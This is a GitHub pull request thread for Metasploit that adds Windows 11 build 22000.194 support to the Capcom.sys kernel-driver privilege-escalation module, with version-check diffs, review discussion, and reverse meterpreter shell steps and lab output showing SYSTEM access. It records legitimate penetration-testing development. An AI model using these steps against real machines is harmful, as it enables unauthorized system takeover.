### PR TITLE
fix #15890: Support Windows 11 in Capcom.sys LPE Module

### LINKED ISSUE #15890: Support Windows 11 in Capcom.sys LPE Module
I tested it on windows 11 22000.194 and it's not working, but when I use this one: https://github.com/tandasat/ExploitCapcom
works perfectly, could someone update the version of metasploit please?

### PR DESCRIPTION
**Pull request by prabhatjoshi321**
Closes #15890  

This pull request is a fix for the issue #15890  meant for the module `modules/exploits/windows/local/capcom_sys_exec.rb`. Earlier the version check for the module relied on `sysinfo` and checked the version number to verify compatibility. Now the version check is updated to use @smashery implementation over at #17336 and the module is tested with the vulnerability in `Windows 11 (build 22000.194)` to verify its functionality for that particular platform. After the verification the description comments are updated accordingly.

## Verification

Following were the steps followed to check the expected results

- [x] Start `msfconsole`
- [x] `use multi/handler`
- [x] `set payload <the payload used>`
- [x] `set LHOST <the interface ip>`
- [x] `set LPORT <the port used in the payload>`
- [x] `run`
- [x] Obtain a reverse meterpreter shell and background it using Ctrl+Z and y.
- [x] `sessions` Note down the session number to use later.
- [x] `use windows/local/capcom_sys_exec`
- [x] `set session <the session number obtained before>`
- [x] `set LHOST <the interface ip>`
- [x] `set LPORT <the desired port>`
- [x] `run`

The exploit works as expected. The reverse meterpreter shell is obtained with system privileges.

Windows version tested on.
image

The output
image

### CODE REVIEW

File: modules/exploits/windows/local/capcom_sys_exec.rb [hunk 1]
```diff
@@ -60,9 +60,7 @@ def initialize(info = {})
   end
 
   def check
-    if sysinfo['OS'] !~ /windows (7|8|10)/i
-      return Exploit::CheckCode::Unknown
-    end
+    return Exploit::CheckCode::Unknown unless session.platform == 'windows'
```
Comment (gwillcox-r7) [inline modules/exploits/windows/local/capcom_sys_exec.rb:63]: This would also include support for Windows XP, Windows 2000, Windows ME, pretty much any Windows version that every existed. Be careful with removing existing checks like this. I don't think this is the right approach here since this would essentially say we have tested and verified this on every version of Windows that has every existed 😄

File: modules/exploits/windows/local/capcom_sys_exec.rb [hunk 2]
```diff
@@ -21,7 +21,7 @@ def initialize(info = {})
             This module abuses the Capcom.sys kernel driver's function that allows for an
             arbitrary function to be executed in the kernel from user land. This function
             purposely disables SMEP prior to invoking a function given by the caller.
-            This has been tested on Windows 7, 8.1 and Windows 10 (x64).
+            This has been tested on Windows 7, 8.1, 10 (x64) and Windows 11 (x64) upto build 22000.194.
```
Comment (gwillcox-r7) [inline modules/exploits/windows/local/capcom_sys_exec.rb:24]: Up to a build? Out of interest was there some error past this build number? If so, would be good to add this in to the documentation.

**Comment by gwillcox-r7** [comment]
@prabhatjoshi321 Does this rely on https://github.com/rapid7/metasploit-framework/pull/17336 being landed before this PR can be landed? If so I'm going to add the `delayed` tag so we know this relies on another PR to be landed before we can land this.

File: modules/exploits/windows/local/capcom_sys_exec.rb (hunk 2 above)
Comment (prabhatjoshi321) [reply modules/exploits/windows/local/capcom_sys_exec.rb:24]: The windows 11 after build 22000 contains blacklist that blocks the vulnerable capcom.sys driver from getting loaded. I tried it with various versions but got no success after the build 22000.

**Comment by prabhatjoshi321** [comment]
Yes, it does rely on the @smashery version check implementation he created in #17336 . You may go ahead and put the delayed flag as it does rely on that.

File: modules/exploits/windows/local/capcom_sys_exec.rb (hunk 1 above)
Comment (prabhatjoshi321) [reply modules/exploits/windows/local/capcom_sys_exec.rb:63]: Yes, I completely agree with you. Shall I revert back the version check. Suggestions would be appreciated.

File: modules/exploits/windows/local/capcom_sys_exec.rb (hunk 2 above)
Comment (gwillcox-r7) [reply modules/exploits/windows/local/capcom_sys_exec.rb:24]: Alright if we can add some documentation on this to the module's docs file and to the module itself that information is great to have and should be added for future travelers 👍

Comment (prabhatjoshi321) [reply modules/exploits/windows/local/capcom_sys_exec.rb:24]: Sure, i'll add those.

File: modules/exploits/windows/local/capcom_sys_exec.rb (hunk 1 above)
Comment (prabhatjoshi321) [reply modules/exploits/windows/local/capcom_sys_exec.rb:63]: Sure, I'll look into the implementation of that. Thanks for the suggestion as it does sound like a better approach to what we are trying to accomplish here.

**Comment by adfoster-r7** [comment]
Looks like the version detection PR Is landed; I think this PR should be unblocked

**Comment by gwillcox-r7** [comment]
Removing delayed flag. This will likely need a rebase to resolve the conflicting file, but should now be ready to land. Thanks for updating this @adfoster-r7!

**Comment by gwillcox-r7** [comment]
@prabhatjoshi321 Any word on rebasing this to pull in latest changes?

File: modules/exploits/windows/local/capcom_sys_exec.rb [hunk 3]
```diff
@@ -60,6 +60,8 @@ def initialize(info = {})
   end
 
   def check
+    return Exploit::CheckCode::Unknown unless session.platform == 'windows'
+
     version = get_version_info
     if version.build_number < Msf::WindowsVersion::Win7_SP0 || version.windows_server?
```
Comment (gwillcox-r7) [inline modules/exploits/windows/local/capcom_sys_exec.rb:66]: I think given the above it might be an idea to check if the build number is greater than or equal to Win11_22H2 which we know won't be vulnerable given your build number comment above.

File: modules/exploits/windows/local/capcom_sys_exec.rb (hunk 1 above)
Comment (gwillcox-r7) [reply modules/exploits/windows/local/capcom_sys_exec.rb:63]: With the new updates to the code since rebase, the code now correctly uses build numbers to check for the target version. I'm going to expand things a bit based on the comment below but once that is done I think we should be good.

File: modules/exploits/windows/local/capcom_sys_exec.rb (hunk 2 above)
Comment (gwillcox-r7) [reply modules/exploits/windows/local/capcom_sys_exec.rb:25]: Added with https://github.com/rapid7/metasploit-framework/pull/17474/commits/d97ccaa3d238ce86974c58272f2847e238bdd3e6

File: modules/exploits/windows/local/capcom_sys_exec.rb (hunk 3 above)
Comment (gwillcox-r7) [reply modules/exploits/windows/local/capcom_sys_exec.rb:68]: Added with https://github.com/rapid7/metasploit-framework/pull/17474/commits/24c8a54e56d422642d787840aa9f072eb2d423f6

File: modules/exploits/windows/local/capcom_sys_exec.rb (hunk 1 above)
Comment (gwillcox-r7) [reply modules/exploits/windows/local/capcom_sys_exec.rb:65]: Added additional logic at https://github.com/rapid7/metasploit-framework/pull/17474/commits/24c8a54e56d422642d787840aa9f072eb2d423f6

**Comment by gwillcox-r7** [comment]
Upon further investigation it should be noted that 10.0.22000.194 is the only public version of Windows 11 that this adds support for. All previous versions were beta versions and as thus are unlikely to have been deployed outside of lab environments. Unfortunately to complicate matters, Visual Studio Subscriptions only lets me download Windows 11 (consumer editions), version 21H2 (updated Nov 2021), not the original Windows 11 21H2 release ISO.

Would you happen to still have a lab environment to test this in with the right Windows 11 version? I can try set one up myself but might take a bit of time.

File: modules/exploits/windows/local/capcom_sys_exec.rb [hunk 4]
```diff
@@ -10,6 +10,7 @@ class MetasploitModule < Msf::Exploit::Local
   include Msf::Post::Windows::Priv
   include Msf::Post::Windows::Process
   include Msf::Post::Windows::ReflectiveDLLInjection
+  prepend Msf::Remote::Exploit::AutoCheck
```
Comment (jheysel-r7) [inline modules/exploits/windows/local/capcom_sys_exec.rb:13]: With this minor change the module was able to be loaded into the framework and was tested successfully.
This should also correct the CI failures. 
```suggestion
  prepend Msf::Exploit::Remote::AutoCheck
```

**Review by jheysel-r7 — COMMENTED** [review]
Thanks for the enhancement @prabhatjoshi321! Changes look good and testing was as expected:
```
msf6 exploit(windows/local/capcom_sys_exec) > rexploit
[*] Reloading module...

[*] Started reverse TCP handler on 192.168.123.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Launching netsh to host the DLL...
[+] Process 6776 launched.
[*] Reflectively injecting the DLL into 6776...
[*] Sending stage (200774 bytes) to 192.168.123.220
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Meterpreter session 5 opened (192.168.123.1:4444 -> 192.168.123.220:49677) at 2023-09-08 12:58:01 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : MSFDEVICE
OS              : Windows 10 (10.0 Build 22000).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter >
```

**Comment by jheysel-r7** [comment]
# Release Notes
This PR adds support to the Capcom.sys driver LPE for Windows 11 21H1
